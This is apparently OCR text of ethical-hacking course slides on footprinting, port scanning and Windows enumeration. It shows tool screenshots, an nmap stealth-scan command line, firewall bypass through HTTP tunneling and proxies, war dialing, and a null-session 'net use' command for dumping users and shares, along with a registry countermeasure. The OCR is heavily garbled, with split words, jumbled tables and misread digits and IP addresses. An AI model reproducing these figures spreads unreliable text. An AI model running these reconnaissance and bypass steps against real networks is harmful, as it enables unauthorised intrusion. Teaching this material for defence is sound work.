dxb-emix-ra , so 1 00 , emix , ae 


139 


139 


139 


139 1 


0 


0% 


EMIRNET-EMIRNET 


7 


166,63,210,62 


bcr2,l:hamesside,cw,net 


442 


442 


442 


442 1 


0 


0% 


CW-NETC52 


8 


63,216,0,42 


pos5-l ,cr02,ash01 ,pc™btn,net 


713 


713 


713 


713 1 


0 


0% 


CAIS-CIDR7 


9 


206,24,233,166 


bhr 1 -pos- 1 0-0 , sterling 1 dc2 , m , net 


446 


446 


446 


446 1 


0 


0% 


CW-05BLK 


10 


216,239,48,193 




508 


508 


508 


508 1 


0 


0% 


GOOGLE 


11 


216,109,33,218 


2 18-google-exodusdc, exodus, net 


442 


442 


442 


442 1 


0 


0% 


DC3-8 


12 


216,239,39,99 


www, google, com 


533 


533 


533 


533 1 


0 


0% 


GOOGLE 




Delhi 

,BU DHABI DHAKA 
Bombay 
l\/ladras 





i 
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Tool : Vi sual Route Trace 



VisualRoute 7.1c Trial Versior 



File Edit Options Tools Help 



- m 



Address | http:/Ayvww. vis ualware.com 



IP Addresses jl 98.64.1 53.97 



^ Advanced mode 



Report for www-visualware.com [198-64.1 53.97] 



Analysis: Www.vj.suajwa.r.e^^^^ is a HTTP senver (running Apache/1 .3.27 (Unix) 

modJk/1.2.0). 




Hop 


%Loss 


IP Address 


Node Name 


Location 


Tzone 


ms 


Graph 


Network 




0 




21 7.165.221.153 


SAM 


* 






D 




467 


Emirates Internet 




1 




213.42.12.6 




(United Arab Emirates) 




125 


H 








Emirates Telecommunicati 


2 




213.42.12.195 




(United Arab Emirates) 




122 


1 


H 






Emirates Telecommunicati 


3 




194.170.2.1 1 7 




(United Arab Emirates) 




124 


1- 


H 






Emirates Internet 




4 




195.229.31.35 


auh-emix-rb.ge6303.er 


(United Arab Emirates) 




122 










Emirates Telecommunicati 


5 




64.86.1 38.1 1 7 


if-0-0.core2.Newark.tel( 


Newark. NJ. USA 


-05:00 


420 










Teleglobe Inc. TELEGLOBE 


6 




129.250.9.229 


p4- 2-0-0. rOO.nwrknjOl .i 


Newark. NJ. USA 


-05:00 


419 






h 




Verio. Inc. VRIG-1 29-250 




7 




129.250.2.21 7 


pi 6-0-1-1 .r20.nycmny0 


New York. NY. USA 


-05:00 


418 










Verio. Inc. VRIO-1 29-250 




8 




129.250.2.33 


p64-0-0-0.r21 .nycmnyO 


New York. NY. USA 


-05:00 


421 






h 




Verio. Inc. VRIO-1 29-250 




9 




129.250.5.99 


pi 6-1-0-1 .r21 .asbnvaO 


Ashburn. VA. USA 


-05:00 


418 






1 




Verio. Inc. VRIO-1 29-250 




10 




129.250.2.34 


p64-0-0-0.r20.asbnva0 


Ashburn. VA. USA 


-05:00 


436 










Verio. Inc. VRIO-1 29-250 




11 




129.250.2.74 


pi 6-3-0-0.r00.stngva01 


Sterling. VA. USA 


-05:00 


420 










Verio. Inc. VRIO-1 29-250 




12 




129.250.27.1 84 


ge-4-1 .cOO.stngvaOl .us 


Sterling. VA. USA 


-05:00 


429 










Verio. Inc. VRIO-1 29-250 




13 




161.58.1 57.61 








420 










Verio. Inc. VRIO-1 61-058 




14 




198.64.153.97 


vwvw.visualware.com 






430 










Verio. Inc. VRIO-1 98-063 





Roundtrip time to vvvvw.visualware.com. average = 430ms. min = 420ms. max= 436ms ~ Mar 1 8. 2003 2:36:39 PM 
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Tool: SmartWhois 



SmartWhois - Evaluation Version 



File Edit View Settings Help 



Clear Open 
IP, host, or domain; 



5ave 5ave All Print 



microsoft, com 



microsoft.com 



Copy 



Pas 



microsoft.ci 



mir^m 207.46.13^ 



SmartWhois is a useful network 
i nfor mati on uti I i ty that al I ows you to f i nd 
out all available information about an I P 
address, host name, or domain, including 
country, state or province, city, name of 
the network provider, administrator and 
technical support contact information 



t flPMIM i 



Microsoft ^_UI |JUI QLIUI I 

1 microsoft way 
redmond, WA 98052 
U5 

Microsoft Corp (EPMK0EAU50) msnhst@MICP 

Microsoft Corp 

One Microsoft Way 

Redmond, WA 98052 

US 

425 882 8080 



Microsoft (EJ5EHEQUA0) msnhst@MICR050F 

Microsoft 

^-^^^ One Microsoft Way 
Redmond, WA 98052 
U5 

425-882-8080 



DN51.CP.M5FT.NET 207.46.138.20 
DNS3.UK.MSFT.NET 213.199.144.151 
DNSl .SJ.MSFT.NET 65.54.248.222 



Unlike Standard Whois 
utilities, SmartWhois can 
find the information about a 
computer located in any part 
of the world, intelligently 
queryi ng the right database 
and delivering all the related 
records withi n a few seconds. 



Done 
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Scenario (contd.) 




Adam makes a few searches and gets some 
internal contact information. Hecallsthe 
receptionist and informs her that theHR had 
asked him to get in touch with a specific IT division 
personnel. It's lunch hour, and he says he'd rather 
mail to the person concerned than disturb him. He 
checks up the mail id on newsgroups and stumbles 
on an IP recording. Retraces the IP destination. 



0 What preventive measures can you suggest to check the 
avai I abi I i ty of sensi ti ve i nf ormati on? 

0 What are the i nnpl i cati ons for the target company? Can 
he cause harm to targetcompany at this stage? 

0 What do you think he can do with the information he 
has obtai ned? 
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^ 



VisualLookout 3.0 



File View Agent Help 

Agent - localhost 

TCP 7 CurrEstab of Z3 



Metric 


Total 


Delta 


Rate 


Outgoing calls 


430 


0 


0. 


00 


Incoming calls 


83 


0 


0. 


00 


In traffic 


140S67 


0 


0. 


00 


Out traffic 


136S19 


0 


0. 


00 


Outgoing fails 


14 


0 


0. 


00 


Outgoing drops 


79 


0 


0. 


00 


Re sends 


101 


0 


0. 


00 


Bad inbound 




0 


0. 


00 


I^epeat reqs 


0 310 


0 


0. 


00 



H Split! 



In traffic 
0.33:Hax 



Status 



Dir IP Address 



Local 




Z3: 10: 08 
Remote CC 



5: establis . 

MIIII§EIIIISI@@I^E3EI£S 

5: estalilis . 
5: establis . 
S : establis . 
£ : establis . 



In 



19Z. 168. 0. 



1079 



139 US 19Z.168. 





In 


192 


In 


192 


In 


192 


In 


19S 



r Listening - 2^ Est at Cancel 



Local addr : 192.168.0.170 
Local port : 139 
Remote addr : 192.168.0.1 
Remote port : 3397 
5tate 5 : established 



Add port to Sentry 139 



Add address to Sentry 192.168.0.1 



Set connection log limits 
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Visual Lookout provides liigli level 
vi ews as wel I as detai I ed and 
historical views that provide traffic 
information in real -time or on a 
historical basis. 

I n addition the user can request a 
"connections" window for any 
server, which provides a real-time 
view of al I the active network 
connections showing 

0who is connected, 

0what service is being used, 

©whether the connection is 
inbound or outbound, and 

0how many connections are 
active and how long they have 
been connected. 



Tool: Visual Route Mai I Tracker 



Report for olympus.bic.nus.edu.sg [137.132.19.100] 



Analysis: ;olymp.usJ.[c,nus,edu,sa' w^^^^ is a SMTP sen/er (ESMTP Send mail 8.1 2.8/8.1 2.7). 



Server 




ailTracker by Visualware 



tinwee@bic.nus.edu.sg 



EuQ IP Adriress Status 



Qlympus.bic.nus.edu.sg 1 0 1 37.1 32.1 9.1 00 ESMTP Sendmail 3.1 2.3/3.1 2.7 
Click on a sen/er name to start a VisualRoute trace 



gapQg^ 



Hop 


%Loss 


IP Address 


0 




21 7.1 65.221.1 53 


1 




213.42.12.6 


2 




213.42.12.131 


3 




1 94.1 70.2.1 1 7 


4 




1 95.229.31.35 


5 




1 95.229.31.34 


6 




62.21 6.1 44.25 


7 




62.21 6.1 40.9 


8 




1 66.90.1 33.1 65 


9 




209.244.1 4.201 


10 




209.247.1 0.233 



Tzone 


ms 




2537 




2513 




2467 




2429 




2421 


* 


2766 


* 


2894 


-08:00 


2655 


-03:00 


2695 


-08:00 


3008 



Node Name 



Location 



Graph 



Network 



SAM 



auh-emix-rb.ge6303.er 
auh-emix-ra.ge6303.er 

ge-1-0-0.0. Corel. sfrl .fl; 
gige4-1-1 1 6.ipcolo2.Sc 
gigabitethernet4-2.core 
so- 4-0-0. mp2.SanFran 



4514 



(United Arab Emirates) 
(United Arab Emirates) 
(United Arab Emirates) 
(United Arab Emirates) 
(United Arab Emirates) 
(United Kingdom) 
(United Kingdom) 
San Francisco, CA, US^ 
San Francisco, CA, US^ 
San Francisco, CA, US/ 



Emirates Internet 
Emirates Telecommunicati 
Emirates Telecommunicati 
Emirates Internet 
Emirates Telecommunicati 
Emirates Telecommunicati 
FLAG Telecom Limited 
FLAG Telecom Limited 
Level 3 Communications, Ir 
Level 3 Communications, Ir 
Level 3 Communications, Ir 
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Screenshot: Visual Route Mail Tracker 



nOp 




Ir Auuress 


iMOue Narne 


Locaiion 


Tzone 


ms 


0 




21 7.1 65.221.1 53 


SAM 


* 






1 




213.42.12.6 


- 


(United Arab Emirates) 




2537 


2 




213.42.12.131 


- 


(United Arab Emirates) 




2513 


3 




1 94.1 70.2.1 1 7 


- 


(United Arab Emirates) 




2467 


4 




1 95.229.31.35 


auh-emix-rb.ge6303.er 


(United Arab Emirates) 




2429 


5 




1 95.229.31.34 


auh-emix-ra.ge6303.er 


(United Arab Emirates) 




2421 


6 




62.21 6.1 44.25 


- 


(United Kingdom) 


* 


2766 


7 




62.21 6.1 40.9 


ge-1-0-0.0. Corel. sfrl .fl; 


(United Kingdom) 


* 


2894 


8 




1 66.90.1 33.1 65 


gige4-1-1 1 6.ipcolo2.Sc 


San Francisco, CA, US^ 


-08:00 


2655 


9 




209.244.1 4.201 


gigabitethemet4-2.core 


San Francisco, CA, US^ 


-03:00 


2695 


10 




209.247.1 0.233 


so- 4-0-0. mp2.SanFran 


San Francisco, CA, US^ 


-08:00 


3008 


11 




64.1 59.0.21 8 


so- 2-0-0. mp2.SanJose 


San Jose, CA, USA 


-08:00 


3073 


12 




64.1 59.2.1 65 


gigabitethemet5-2.core 


San Jose, CA, USA 


-03:00 


3009 


13 




209.244.3.246 


GigabitEthemet5-0.edg 


Palo Alto, CA, USA 


-08:00 


2996 


14 




209.245.1 46.1 50 


Single l-Level3-oc3.ix.si 






2962 


15 




203. 20S. 132.21 




Singapore 


+03:0( 


2974 


16 




203.208.1 72.29 


p6-8.sngtp-cr2.ix.singte 


Singapore 


+08:0( 


3061 


17 




202.1 60.250.1 54 




Singapore 


+08:0( 


3029 


18 




165.21.12.78 


FE-4-O-O.lavencJer.sing 


(Singapore) 


+08:0( 


2995 


19 


20 


1 65.21.43.1 02 




Singapore 


+03:0( 


3201 


20 


30 


1 37.1 32.1 9.1 00 


Olympus. bic.nus.edu.S! 


(Singapore) 


+08:0( 


3473 


21 


30 


1 37.1 32.1 9.1 00 


Olympus. bic.nus.ecJu.S! 


(Singapore) 


+08:0( 


3276 


22 




1 37.1 32.1 9.1 00 


Olympus. bic.nus.edu.S! 


(Singapore) 


+03:0( 


3179 


23 




1 37.1 32.1 9.1 00 


Olympus. bic.nus.edu. SI 


fSinqapore) 


+08:0( 


3159 



Graph 



Network 



Ir 



4514 



Emirates Internet 
Emirates Telecommunicati 
Emirates Telecommunicati 
Emirates Internet 
Emirates Telecommunicati 
Emirates Telecommunicati 
FLAG Telecom Limited 
FLAG Telecom Limited 
Level 3 Communications, 
Level 3 Communications, 
Level 3 Communications, 
Level 3 Communications, 
Level 3 Communications, 
Level 3 Communications, 
Level 3 Communications, 
SingTel Internet Exchange 
SingTel Internet Exchange 
Singapore Telecommunica 
Singapore Telecommunica 
Singapore Telecommunica 
National University of Singa 
National University of Singa 
National University of Singa 
National University of Singa 
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Tool: eMailTrackerPro 



eMailTrackerPro by Visual ware 



File Edit View Help 



"Long Distance - 4.9 cents per min - NO FEES!" 

e-mail Analysis: 




From: IP address 203.127.89.138. 
Location: Singapore - For a detailed geographic trace, jm.yisua[Rpute. 
Mailer: The sender used 'QUALCOMM Windows Eudora Pro Version 4.1 ' to send the e-mail. 
Received Headers: Attempted misdirection: 'tes1a623.0neMail.com.sg' is not 
203.1 27.88.1 29 in Rl. (El 2). Attempted misdirection: 'drb.com' is not 203.1 27.89.1 38 in R2 





Singapore 



eMailTrackerPro isthee-mai 
analysis tool that enables analysis 
of an e-mail and its headers 
automatically and provides 
graphical results 
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Tool: Mail Tracking (mail track! ng.com) 




track 

ryour 




Welcome to MailTracking.com ! 

Mai {Tracking lets you know when emai 
youVe sent gets read 



Easy to use! 

Just add .mailtracking.com onto the end M gj | TrSCki HQ i S 3 

of your recipients email address when j_ i ■ ■ j_ 

sending email to them from your normal tracKi na servi ce mat 

allows the user to track 
when his mail was 
read, for how long and 
how many ti mes. 1 1 
also records forwards 
and passing of 
sensitive information 
(MS Office format) 



Start here! 



^ more information ^ business 
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Summary 



0 I nformation gathering phase can be categorized broadly 
i nto seven phases. 

© Footpri nti ng renders a unique security prof i le of a 
target system. 

0 Whois, ARI N can reveal public information of a domain 
that can be leveraged further. 

0 Traceroute and mai I tracki ng can be used to target 
specific I P and later for I P spoofing. 

0 Nslookup can reveal specific users and zone transfers 
can compromise DNS security. 
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Ethical Hacking 



Modulelll 
Scanning 



Scenario 



L 




Tim had got the much needed break he was looking 
f or . H e was goi ng to be assi sti ng the systems 
administrator of his division in securing their 
information systems. It was a dream come true for 
him as hewas always interested in incident 
response. 



Tim began by browsing through the system architecture. Yes, 
they had the usual systems- firewall, mail server, NIDSanda 
couple of servers that were always up for remote users. At f i rst 
sight, traffic seemed normal and there was nothing amiss. 
Anyway, he decided that he would just monitor the systems in his 
neighborhood for any abnormal activity. 

© Wheredoyou think Tim should begin with his security initiative? 
© What would thefirst signs that his systems are under attack? 



BC-Gouncll 



Module Objective 



© Detecti ng 'I i ve' systems on target network. 

© Discovering services running/ listening on 
target systems. 

© Understanding port scanning techniques. 

© Identifying TCP and UDP services running on 
target network. 

© Discoveri ng the operati ng system 

© Understanding active and passive 
f i ngerpri nti ng. 

© Automated discovery tools. 
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Detecting 'Live' Systems On Target 
Networl< 



Why? 

© To determi ne the peri meter of the target 
network / system 

© To faci I itate network mappi ng 

© To bui Id an i nventory of accessi ble systems on 
target network 

Tools 

© War Dialers 
© Ping Utilities 
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© A war dialer is a tool used to scan a large pool of 
telephone numbers to detect vulnerable modems to 
provi de access to the system. 

© A demon dialer is a tool used to monitor a specific 
phone number and target its modem to gain access to 
the system. 

© Threat is high in systems with poorly configured remote 
access products providing entry to larger networks. 

© Tools include THC-Scan, ToneLoc, TBA etc. 



War Dia er 



Hacker 
Dial-in 




PSTN 



I nternet 





Outside 
^oi^er 




iai-in 
jN^odem 



F i rewal I 




Server 



-'+rfside 
outer 
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Tool : TH C Scan 




Scan Node : :|J^ 
Dial Mode : RflNDOr 
Manual/AutDnom Mode 

CARRIER Hack Mode : 



Nudge : 

Timeout 
R in gout 



501 
6 



seconds 
seconds 



Nudge Delai/ : 60 



gue s t ^M^~gue s t ^M^~I NFO^M^MLO 



Calculate Elapsed Time 



Redial Busi; : VES 

BUSV Ouerurite : NOi 

VES NO DIALTONE exit : 201 

minutes 



Auto DAT saue time : 101 
DATA saue exceptions : 0B 

DAT Filename calculation : Delete Left + Delete Special| 
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Ping 



© Ping send out an I CM P Echo Request packet and awaits 
an I CM P Echo Reply message from an active machine. 

0 Alternatively, TCP/ U DP packets are sent if i ncomi ng 
I CM P messages are blocked. 

© Pi ng hel ps i n assessi ng network traff i c by ti me stampi ng 
each packet. 

© Pi ng can also be used for resol vi ng host names. 

© Toolsinclude Pinger, WS_Ping ProPack, NetScan 
Tools, HPing, icmpenum 
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Tool: Pinger 



tV Pinger vl .O - RhinoS 




L J 



Detecti ng Pi ng Sweeps 



Pi ng sweeps form a basic step i n network mappi ng by 
polling network blocks and/ or I P address ranges. 

Ping Utilities include: 

• WS_PingProPack ( www.ipswitch.com ) 

• NetScan Tools ( www.nwpsw.com ) 

• Hping ( http:/ / www, h pi nq.orq/ down I oad . html ) 

• i cmpen u m ( www, n mr c. org/ f i I es/ su n i x/ i cmpen u m- 1 1 1 tqz ) 

Ping Sweep Detection utilities include: 

• Network based I DS ( www.snort.org ) 

• Genius ( www.indiesoft.com ) 

• Black! CE ( www.networkice.com ) 

• Scanlogd ( www.openwal I .com/ scanlogd ) 
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D i scover i ng servi ces r u n n i ng/ 
i sterling on target systems. 



Why? 

© To determi ne I i ve hosts i n the event of I CM P requests 
being blocked by host. 

© To identify potential ports for furtheri ng the attack. 

© To understand specific applications/ versions of a 
servi ce. 

© To di scover operati ng system detai I s. 
Tools 

© Port Scanners 
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TCP three-way handshake 



1 SYN sent from Client 



1 



Client 




2. SYN/ACK sent from Server 




3. ACK sent from Client 



i 



Seiw 
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Understanding Port Scanning 
Techniques 



©Port Scanning is one of the most popular 
reconnaissance techniques used by hackers to discover 
services that can be compromised. 

0A potential target computer runs many 'services' that 
listen at 'well-known' 'ports'. 

©By scanning which ports are aval I able on the victim, the 
hacker finds potential vulnerabilities that can be exploited. 

©Scan techniques can be differentiated broadly into 
Vanilla, Strobe, Stealth, FTP Bounce, Fragmented 
Packets, Sweep and U DP Scans. 
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Port Scanning Te 
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Port Scanning 
Techniques can be 
broadly classified into: 

© Open scan 

© Half- open scan 

© Stealth scan 

© Sweeps 

© Misc 



Tool: ipEye, IPSecScan 



u 



^Select C:\WINNT\System32\cmd-eKe 



ipEye 1-2 - <c> 2000-2001, flrne Uidstron <arne -uidstrorientsecurity-nu> 
- http://ntsecurity -nu/toolbox/ipeye/ 

Error: Too few parameters. 

Usage : 

ipEye <target IP> <scantype> -p <port> [optional parameters] 

ipEye <target IP> <scantype> -p <from port> <to port> [optional parameters] 

<scantvpe> is one of the following: 
-syn = SVN scan 
-fin = FIN scan 
-null = Null scan 
-xmas = Xmas scan 

<note: FIN, Null and Xmas scans don't worlf against Windows systems - 

[optional parameters] are selected from the following: 
-sip <source IP> = source IP for the scan 
-sp <source port> = source port for the scan 

-d <delaiP in ms> = delai; between scanned ports in milliseconds 

<default set to 750 ms>i 



Id 
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Tool: NetScan Tools Pro 2003 



^"^ NetScanTools Pro 2003 (TM) QQfX 



DHCP I NetBioslnfo | Network Info and Stats | Email Validate | SMTP Email Generator/RelaiJ Test | Arp 
TTCP ] What's New at N WPS W ] TCP Term ] NetTopography | TimeSync ] Finger ] Launcher ] Simple Services 
Database Tests I I DENT Server Winsocklnfo Preferences RFC Reference About 



DS Fingerprinting | RPC Info 
Name Server Lookup Ping 



IP Packet Viewer | IP/MAC Address Management | Subnet Calculator | Detection 
TraceRoute 1 Whois 1 NetScanner Port Probe 1 SNMP 1 H^^perTrans 



mx 



image Key- 



I mages have 
tooltips. 



^' Probe Single Host 
r" Probe IP Range 
Target Hostname or Start IP Address 

3^1 



132.1 68. 



n Show non-responding ports 
Start Port Connection Timeout [ms) 



End IP Address 



localhost 



End Port 
~TJ ^ [65535 



Wait After Connect (ms) 
1000 



Ready. 



Target Computer List 



A) 



a-H 192.168. 






# 00021 


- TCP 




# 00023 


- TCP 




• 00025 


- TCP 




# 00080 


- TCP 




# 00110 


- TCP 




# 00280 


- TCP 




# 00515 


- TCP 




# 00631 


- TCP 




# 05120 


- TCP 




# 05121 


- TCP 



ftp - response: 3 msec 
telnet - response: 3 msec 
smtp - response: 0 msec 
http - response: 3 msec 
pop3 - response: 0 msec 
http-mgmt - response: 3 msec 
printer - response: 3 msec 
ipp - response: 3 msec 
unknown - response: 3 msec 
unknoxm - response: 3 msec 



1 192.1 68.0.50 _^ 



Seq Probe 



Probe Port List 



Seq Target List 



Port/Target List 



Stop 



Edit Target List 



Edit Port List 



Setup 



Create Reports 



Clear Results 



Print 


Save 


HTML 


Find 


Copi^ 


<-> 


Email 


RFCs 


Navigate 


Help Wizard 


Exit 


Help 



Tool: Super Scan 



^ SuperScan 3.00 
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-Hostname Lookup - 



[targeTcom 
Resolved 



Lookup 



targe^c 



Me 



Interfaces 



Configuration 

Port list setup 



Start|G4.3x.3x.xxx 



S top lG4.3x.3K.m 

PrevC| Nextc| 1..254| 

[7 Ignore IP zero 
P Ignore IP 255 
|~ Extract from file -> | 



Timeout 

Ping 
|400 

Connect 
|2000 

Read 
|4000 



Scan type- 



|~ Resolve hostnames 

P Only scan responsive pings 

[7 Show host responses 

C Ping only 

(* Every port in list 

C All selected ports in list 

r All list ports from fl |G5535 

r All ports from [l |G5535 



Scan- 



IG43" 



[643^ 



Resolving 



Start 



Stop 



Speed 

Max 



Min 



bV G4.39.30.117 

i "» 25 Simple Mail Transfer 
i -» 80 World Wide Web HTTP 

I ^■■■H HTTP/1.1 200 OK.. Server: Microsoft-IISM.O.. Cache-Control: no-cache 
a - • 110 Post Office Protocol - Version 3 

^■■■S +0KX1 NT-POP3Server^H-c°^('^^^''5 0S 227181-2).. 
135 DCE endpoint resolution 
■■■■ • 1 43 Internet Message Access Protocol 
1032 BBN IAD 
5G31 pcANWHEREdata 
■■■■ * 5800 Virtual Network Computing server 
a - • 5800 Virtual Network Computing server 
^■■■S RFB 003.003. 



Active hosts 



□ pen ports 



res: Sua 20 Apr 2003 1 4:40:08 GMT..Cc 



Save I 
Collapse all I 
Expand all | 
^ I Prune | 



Tool : N M ap ( N etwor k M apper ) 



INMap Win V 1.3.1 



Host: 



192.1G8.2.118 











Scan 1 


Stop 








Help 1 


Exit 









Scan I Discover | Options | Tinning | Files | Service ] Win32 | 
r Mode 1 p Scan Options 



C Connect ^ Null Scan ^ Window Scan 

SYN Stealth r XmasTree r RCPScan 

r FIN stealth r iPScan C List Scan 

C Ping Sweep ^ Idle Scan 

r UDPScan C ACKScan 



n Port Range f Use Decoy V Bounce Scan 



|~ Device |~ Source Address iT Source Port 



|~ Idle Scan Host 



■Output- 



Starting nmap V. 3.00 C ^^mvi^. 1 nsecure. org/nmap ') 

Host jo . 16S. 2 . lis]) appears to be down, skipping it. 

Note: Host seems down. If it is really up, but blocking our ping probes, try -PO 
Nmap run completed — 1 IP address Co hosts up]) scanned in 3 seconds 



Uj 



|CMD: -sS -PT -PI -R -0 -vv -T 5 --winjorcerawsock 1S2.1 68.2.1 18 



f| 22/04/03 I 21:26:23 
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Active Stack Fingerprinting 



0 F i nger pr i nti ng i s done to determi ne the remote OS 

©All ows attacker to I eave smal I er f ootpr i nt and have 
greater chance to succeed 

0 Based on the fact that various OS vendors implement 
the TCP stack differently 

0 Special I y crafted packets sent to remote OS and 
response is noted. This is compared with a database to 
determine the OS 



Bl-Council 



L i 



Passive F i ngerpri nti ng 



0 Passive fingerprinting is also based on the differential 
i mpl antati on of the stack and the var i ous ways an OS 
responds to it. 

© H owever, i nstead of reiyi ng on scanni ng the target host, 
passive f i ngerpri nti ng captures packets from the target 
host and study it for tel I tale signs that can reveal the 
OS. 

© Passive fingerprinting is less accurate than active 
f i ngerpri nti ng. 
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Cheops 




Z07.Z30.7Z.Z6 

Z07.Z30.7Z. 8 



Saved 7root/.cheops-map' 
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SocksChai n 



0 SocksChai n is a program 
that allows to work 
through a chain of 
SOCKS or HTTP proxies 
to conceal the actual I P- 
address. 

© SocksChai n can function 
as a usual SOCKS- server 
that transmits queries 
through a chain of 
proxies. 
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1 ■ III ^ilil 1 1 ^!:-| 1 1 ^!:i -i| 1 1 


■III M-i M 






=: :=: 








yii; i:^ ■_■ ■ 


III 




^==^::: :=: 
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\^ -iz^ z :=: 


mil 

WW 




On 


i:ei- 






:it.2:= lot. : :=: 






Qui 


i:h-in:i;- 
















:ii-".-ik 








i^SLEEir. ^ :e: 


WW 




Or- 


Ml-- - I- 










w 




Qii; 


i:ei- :i--- 













Proxy Servers 



© Proxy is a network computer that can serve as an 
intermediate for connection with other computers. They 
are usually used for the foil owing purposes: 

• As f i rewal I , a proxy protects the I ocal network from outsi de access. 

• As I P-addresses multiplexer, a proxy allows to connect a number 
of computers to I nternet when havi ng only one I P-address 

• P roxy servers can be used (to some extent) to anonym! ze web 
surfing. 

• Specialized proxy servers can filter out unwanted content, such as 
ads or 'unsuitable' material. 

• P roxy servers can afford some protecti on agai nst hacki ng attacks. 
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Anonymizers 



© Anonymi zers are servi ces that hel p make your own web 
surfing anonymous. 

© The first anonymi zer developed wasAnonymizer.com, 
created i n 1997 by Lance Cottrel I . 

© An anonymizer removes all the identifying information 
from a user's computers whi le the user surfs the 
I nternet, thereby ensuri ng the privacy of the user. 
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Bypassi ng F i rewal I usi ng H ttptunnel 



http://www.nocrew.org/ software/ httptunnel .html 

0H ttptunnel creates a bidirectional virtual data path tunneled 
in HTTP requests. The requests can be sent via an HTTP proxy 
if so desired. 



C:\WINDOWS\System32\cmd.exe 

Tunnel 3.3>htc -help °~ ^ ~ 

Usage: htc [OPTION]... HOST [: PORT] 

Set up a httptunnel connection to PORT at HOST ^default port is 8888>. 
Jhen a connection is nade, I/O is redirected from the source specified 
by the — device.^ — ^£oruard-port or — stdin-stdout switch to the tunnel. 



— proxy-authorization USER: 
— proxy-author izat ion-f ile 
— proxy-buff er-size BVTES 

— content-length BVTES 

—device DEUICE 

— forward-port PORT 

— help 

— keep-aliue SECONDS 

— nax-connect ion-age SEC 

—pro xy H OS T Nft ME [ : PORT ] 
— stdin-stdout 

— strict-content-length 
— timeout TIME 

— user-agent STRING 
— version 
— no -daemon 



PASSUORD proxy authorization 

FILE proxy authorization file 

assume a proxy buffer size of BVTES bytes 

<k, M, and G postfixes recognized> 

use HTTP PUT requests of BVTES size 

<k, M, and G postfixes recognized^ 

use DEUICE for input and output 

use TCP port PORT for input and output 

display this help and exit 

send keepaliue bytes every SECONDS seconds 
^default is 5> 

maximum time a connection will stay 
open is SEC seconds ^default is 300> 
use a HTTP proxy ^default port is 8080> 
use stdin/stdout for communication 
^implies — no-daemon> 

always write Content-Length bytes in requests 

timeout, in milliseconds, before sending 

padding to a buffering proxy 

specify User-Agent value in HTTP requests 

output version information and exit 

don't fork into the background 



Id 



Bl-Council 



HTTPort 



HTTPort 3.SNF 



System Proxy | Port mapping | About | Register] 
HTTP proxy you need to bypass 



Host name or IP address: 



r 



Port! 



■ Proxy options - 

^ Authorize 
User name: 



Other options 
User-Agent: 
|lE 6.0 



3 

emote host ^ | 



Bypass mode 



■ Use personal remote host at (if blank, use public) — 
Hostname or IP address: Port; Password: 

I F — I 



_?J<— This button helps 



System] Proxy Port mapping | About J Register] 



Static TCP/IP port mappings 


(tunnels) 






l+j- Yahoo! POPS 




Q" External HTTP proxy (sa 


mple) 


Microsoft News seryer 




l+j - IRC server (sample) 




□■■Microsoft Outlook POPS 




□■■Microsoft Outlook SMTP 




Select a mapping to see statistics; 


No stats - inactive 




n/a X n/a B/sec 


n/a K 



■ Built-in SOCKS4 server 

p Run SOCKS server (port lOSO) 
Available in "Remote Host" mode; 
n Full SOCKS4 support (BIND) 



_?J<— This button helps 



J 



ove j 



□ □□□ 

O Proxy 



HTTPort allows you to bypass an HTTP proxy, which is 
blocking you from the I nternet. With HTTPort you may 
use the f ol I owi ng software (j ust a sampi e I i st, not 
limited to !) from behind an HTTP proxy: e-mail, I RC, 
I CQ, news, FTP, Al M , any SOCKS capable software, etc. 
etc. 
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Summary 



0 War dialing is the term given to accessing a network 
illegally over a compromised phone line. Popular tools 
includeTHC war dialer and phone sweep. 

© Scanning is a method adopted by administrators and 
crackers al i ke to di scover more about a network 

0 There are various scan types - SYN, FIN, Connect, ACK, 
RPC, I nverse M appi ng, FTP Bounce, I die Host etc. The 
use of a particular scan type depends on the objective at 
hand. 

0 Ways to subvert a standard connection include 
HTTPort, HTTP tunneling, using proxies, SOCKS 
chains and anonymizers. 
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Ethical Hacking 



ModulelV 
Enumeration 



Module Objective 



© Understanding Windows 2000 enumeration 

© H ow to Connect vi a N ull Sessi on 

© How to disguise NetBIOS Enumeration 

© Disguise using SNI^/IP enumeration 

© How to steal Windows 2000 DNS information 
usi ng zone transfers 

© Learn to enumerate users via CI FS/ SM B 

© Active Directory enumerations 
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0 If acquisition and non intrusive probing have not 
turned up any results, then an attacker will next turn to 
identifying valid user accounts or poorly protected 
resource shares. 

© Enumeration involves active connections to systems 
and directed queries. 

© The type of information enumerated by intruders: 

• N etwork resources and shares 

• Users and groups 

• Applications and banners 



Net Bios Nu I Sessions 



© The null session is often refereed to as the Holy Grail of 
Wi ndows hacki ng. N ul I Sessi ons take advantage of f I aws 
in theCIFS/SMB (Common I ntemet File System/ 
Server Messaging Block). 

© You can establish a Null Session with a Windows 
(NT/2000/XP) host by logging on with a null user 
name and password. 

© Using these null connections allows you to gather the 
f ol I owi ng i nf or mati on from the host: 

• List of users and groups 

• List of machines 

• List of shares 

• Users and host SI Ds (Security I dentifiers) 
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©Anyone with a NetBIOS 
connection to your connputer 
can easi ly get a ful I dunnp of 
all your usernannes, groups, 
shares, pernnissions, policies, 
services and more usi ng the 
Null user. 

©The above syntax connects 
to the hidden I nter Process 
Communication 'share' (I PC$) 
at I P address 192.34.34.2 with 
the built- in anonymous user 
(/u:"") withC") null 
password. 
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©The attacker now has a 
channel over which to attempt 
various techniques. 

©TheCIFS/SMBand 
NetBIOS standards in 
Windows 2000 include APIs 
that return rich information 
about a machine via TCP port 
B9 - even to unauthenticated 
users. 

C:\>net use \\ 192.34.34.2 
\IPC$ ""/u: "" 



Null Session Countermeasure 



© Null sessions require access to TCP B9 and/ or 
TCP 445 ports. 

© You could al so disableSMB services entirely on 
individual hosts by unbinding Wl NS Client 
TCP/ 1 P from the i nterface. 

© Edit the registry to restrict the anonymous user. 

• 1 Open regedt32, navigate to 

H KLM\SYSTEM\CurrentControlSet\LSA 

• 2. Choose edit j add value 

• val ue name: Resti cAnonymous 

• Data Type: REG_WORD 

• Value: 2 
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NetBI OS Enumeration 



©N BTscan is a program 
for scanning I P networl<s 
for NetBIOS name 
information. 

©For each responded host 
it lists IP address, 
NetBI OS computer name, 
logged- in user name and 
MAC address. 

© The f i rst thi ng a remote attacker wi 1 1 try on a Wi ndows 
2000 network is to get I ist of hosts attached to the wi re. 

1 net view/ domain, 

2. nbstat -A <some I P> 
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E]C:\WIINWT\5ysl:em32\cmd. 
Doing NBT name scan fc 



Jnjxj 



192.168.2.0 
192.168.2.1 



Sendto failed: Cannot 
Recufpon failed: Conne 



192.168.2.0/24 



sign requested addr 
ion reset hy peer 



